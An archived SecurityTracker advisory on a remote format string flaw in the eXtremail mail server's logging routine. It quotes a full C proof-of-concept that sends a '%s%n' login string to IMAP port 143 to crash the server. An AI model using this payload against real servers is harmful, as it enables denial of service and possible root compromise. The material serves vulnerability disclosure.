SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (E-mail Server)  >   eXtremail Vendors:   extremail.com
(Latest Version *Still* Vulnerable; Denial of Service Exploit is Available) eXtremail Mail Server Yields Root Level Privileges for Remote Users
SecurityTracker Alert ID:  1009952
SecurityTracker URL:  http://securitytracker.com/id/1009952
CVE Reference:   CVE-2001-1078   (Links to External Site)
Date:  Apr 27 2004
Impact:   Execution of arbitrary code via network, Root access via network
Exploit Included:  Yes  
Version(s): 1.5.9
Description:   A vulnerability has been discovered in the eXtremail mail server that allows remote users to obtain root level privileges on the server.

The format string problem is reportedly located in the flog() function, where user-supplied data is used as the format string for an fprintf() statement.

A remote user can send appropriately constructed strings as the arguments to the following commands to obtain root-level privileges on the server:

Smtpd - HELO / EHLO / MAIL FROM:<....@....> / RCPT TO:<....@....>
Pop3 - USER (+ others requiring a suitable login).

Luca Ercoli indicates that the IMAP service is also affected and has provided demonstration expoit code, available in in the Source Message.

Impact:   A remote user can cause arbitrary commands to be executed by the mail server with root level privileges, giving root level access to the server.
Solution:   The vulnerability was reportedly fixed in version 1.1.10 but then re-introduced in more recent versions. Versions 1.5.5 and 1.5.8 were previously reported to be vulnerable. Luca Ercoli reports that 1.5.9 is also vulnerable.
Vendor URL:  www.extremail.com/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (AIX)

Message History:   This archive entry is a follow-up to the message listed below.
Jun 22 2001 eXtremail Mail Server Yields Root Level Privileges for Remote Users



 Source Message Contents

Subject:  Remote Format String Vulnerabilities in eXtremail




Package: eXtremail
Auth: http://www.extremail.com/
Version(s): 1.5.9 (current release)
Vulnerability: Format String




eXtremail is a Unix mail server that supports SMTP/POP3/IMAP protocols.
It includes support for virtual domains, spoofing attack ,SSL connection
and Antivirus checking.



Vulnerability Description:

Format string vulnerabilities exist in the logging routines of eXtremail,
allowing remote attackers to gain root privileges.
This security flaw can be exploited by supplying a specially crafted string
containing format specifiers  to various SMTP,POP and IMAP commands. 
The vulnerability has been reported to affect some previous versions 
(BugTraq ID: 2908), has been reintroduced in latest version of eXtremail.


Here is a snippet of eXtremail's log:

25/04/2004 - 16:26:29 -> ----------------------------------------------
25/04/2004 - 16:26:29 -> - IMAP - Incoming IMAP connection            -
25/04/2004 - 16:26:29 -> ----------------------------------------------
25/04/2004 - 16:26:29 -> IMAP - IMAP connection: 192.168.0.150
25/04/2004 - 16:26:29 -> IMAP - Error: User %s25/04/2004 - 16:26:29 -> SIGN - Signal: segmentation fault received
25/04/2004 - 16:26:29 -> SIGN - Signal: segmentation fault received



After a successful denial of service attack, eXtremail must be restarted 
to regain its functionality (Smptd,Pop3d,Imapd,Remt).






Proof of Concept:

------ eXtremail-kill.c --------


/**********************************************
*  Proof of Concept                           *
*  eXtremail 1.5.x Denial of Service	      *
*					      *
*  Luca Ercoli	<luca.e [at] seeweb.com>      *
*  Seeweb	   http://www.seeweb.com      *
*					      *
***********************************************/

#include <stdio.h>
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>

#define PORT 143
#define MAXRECVSIZE 100


int main(int argc, char *argv[]);
void crash(char *host,int TYPE);


int numbytes;



void crash(char *host,int TYPE)
{

 int sockfd;  
 char buf[MAXRECVSIZE];
 struct hostent *he;
 struct sockaddr_in their_addr; 
 char poc[]="1 login %s%s%s%s%s%s%s%s%s %s%s%s%s%s%s%s%s%n%n%n\n";


  if ((he=gethostbyname(host)) == NULL) 
     {  
      perror("gethostbyname");
      exit(1);
     }

  if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
     {
      perror("socket");
      exit(1);
     }

 their_addr.sin_family = AF_INET;   
 their_addr.sin_port = htons(PORT);  
 their_addr.sin_addr = *((struct in_addr *)he->h_addr);
 memset(&(their_addr.sin_zero), '\0', 8); 

  if (connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1)
     {
      perror("connect");
      exit(1);
     }

   
  if ((numbytes=recv(sockfd, buf, MAXRECVSIZE-1, 0)) == -1)
     {
      perror("recv");
      exit(1);
     }

 buf[numbytes] = '\0';

  if (TYPE == 0)
     {
      printf("[+] Server -> %s",buf);
      sleep(1);
      printf("\n[!] Sending malicious packet...\n");

      send(sockfd,poc, strlen(poc), 0);
      sleep(1);
      printf ("\n[+] Sent!\n");
     }

 close(sockfd);

}



int main(int argc, char *argv[])
{
    
 printf("\n\n  eXtremail 1.5.x Denial of Service  \n");
 printf("by Luca Ercoli <luca.e [at] seeweb.com>\n\n\n\n");


  if (argc != 2) 
   {	
    fprintf(stderr,"\nUsage -> %s hostname\n\n",argv[0]);
    exit(1);
   }
 
 crash(argv[1],0);
 numbytes=0;
 printf ("\n[+] Checking server status ...\n");


 if(!fork()) crash(argv[1],1);
 sleep(5);
 if (numbytes == 0) printf ("\n[!] Smtpd/Pop3d/Imapd/Remt crashed!\n\n\n");

 return 0;

 
}

-------------------------------



Solution:
No solution available at the moment.







Credits:

-- 
Luca Ercoli	<luca.e [at] seeweb.com>
Seeweb		http://www.seeweb.com

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC